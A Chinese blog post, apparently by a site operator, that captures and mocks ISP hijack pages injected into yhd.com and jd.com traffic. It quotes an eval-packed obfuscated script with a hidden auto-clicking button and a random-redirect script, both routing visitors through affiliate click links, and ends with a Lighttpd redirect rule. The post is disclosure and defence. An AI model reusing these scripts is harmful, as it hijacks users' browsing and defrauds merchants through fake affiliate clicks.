又抓到个新的一号店 ISP 劫持(更新京东的 ISP 劫持)

前面有抓到个新的一号店 yhd.com 的 ISP 劫持,还是老一套,劫持到 IFRAME + 跳转页面。无聊不无聊,高点技术含量的都玩不来么?

劫持页面是:

    <html>
        <head></head>
        <body style="margin:0px;overflow-x:hidden;overflow-y:hidden;">
            <iframe id="i" width="100%" height="100%" frameborder="no" style="position:fixed;" onload="" scrolling="auto" src="http://stat.51lama.com/stat/2014-11-24/2014-11-24-3.html">
                #document
    (IFRAME 中的内容见下文)
            </iframe>
        </body>
    </html>

嵌套的 IFRAME 里面的内容是:

<html>

    <head></head>
    <body>
        <div style="display:none;">
            <script type="text/javascript">
              
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('f 2="";f n=i.E(i.J()*I);9(4.H==""){2="3://8.j.d/?m=g&a=o&l=r&h=0&q=1&v=3%u%5%s.c.6%5"}b{9(n>=G){2="3://8.j.d/?m=g&a=o&l=r&h=0&q=1&v=3%u%5%s.c.6%5"}b{2="3://p.T.6/n?k=O-&e=M&D=1.1.1.1&t=3://R.c.6/"}};9(!x.N){4.z(\'<Q A="y:w" S="P" C="7" U="" L="x.F=\\\'\'+2+\'\\\'">\');4.B(\'7\').8()}b{4.z(\'<a A="y:w" K="\'+2+\'" C="7"></a>\');4.B(\'7\').8()}',57,57,'||mysrc|http|document|2F|com|ihub|click|if||else|yhd|cn||var|yihaodian|l_cd1|Math|linktech|||||A100196947||l_cd2|99999|2Fwww||3A|tu|none|window|display|write|style|getElementById|id|spm|floor|location|50|referrer|100|random|href|onclick|hao123|attachEvent|2mLErnzLWcLErI6H2mLErntl1QLm6EWe6E4HWNKqrI6HkQLErJKe3NyyWnB8rZUKY9y4KQL|button|input|www|type|yiqifa|value'.split('|'),0,{}))

            </script>
            <input id="ihub" type="button" onclick="window.location='window.location='http://click.linktech.cn/?m=yihaodian&a=A100196947&l=99999&l_cd1=0&l_cd2=1&tu=http%3A%2F%2Fwww.yhd.com%2F'" value="" style="display:none"></input>
        </div>
    </body>

</html>

基本就是嵌套的页面包含个隐藏按钮,在你点击时候会出发广告连接然后跳转回 yhd.com

呵呵呵,继续 Lighttpd 301 伺候。

$HTTP["host"] =~ "^(stat)\.(51lama)\.(com)$" {
    url.redirect = ( "^/(.*)" => "http://www.yhd.com" )
}

题外话:看到这个域名第一反应是51喇.嘛。。。。

更新一个京东的:

jd.com  被直接重定向到 tt4.51lama.com
内容是:

<head>
  <meta charset="UTF-8">
  <title>京东网上商城-综合网购首选</title>
 </head>
 <body>
  <script language="javascript"> 
window.onload = function(){ 
var arr = ["http://count.chanet.com.cn/click.cgi?a=524637&d=22338&u=&e=&url=http%3A%2F%2Fwww.jd.com",
           "http://count.chanet.com.cn/click.cgi?a=524638&d=22338&u=&e=&url=http%3A%2F%2Fwww.jd.com",
           "http://count.chanet.com.cn/click.cgi?a=524639&d=22338&u=&e=&url=http%3A%2F%2Fwww.jd.com", 
           "http://count.chanet.com.cn/click.cgi?a=524640&d=22338&u=&e=&url=http%3A%2F%2Fwww.jd.com",
           "http://count.chanet.com.cn/click.cgi?a=524641&d=22338&u=&e=&url=http%3A%2F%2Fwww.jd.com"]; 

var index = Math.floor((Math.random()*arr.length));
window.location.href=arr[index]; 

} 
</script> 
 </body>
</html>

他喵的这谁家小孩?太有出息了,居然学会随机数和数组了。来,撒花~~~

Leave a Reply

Your email address will not be published. Required fields are marked *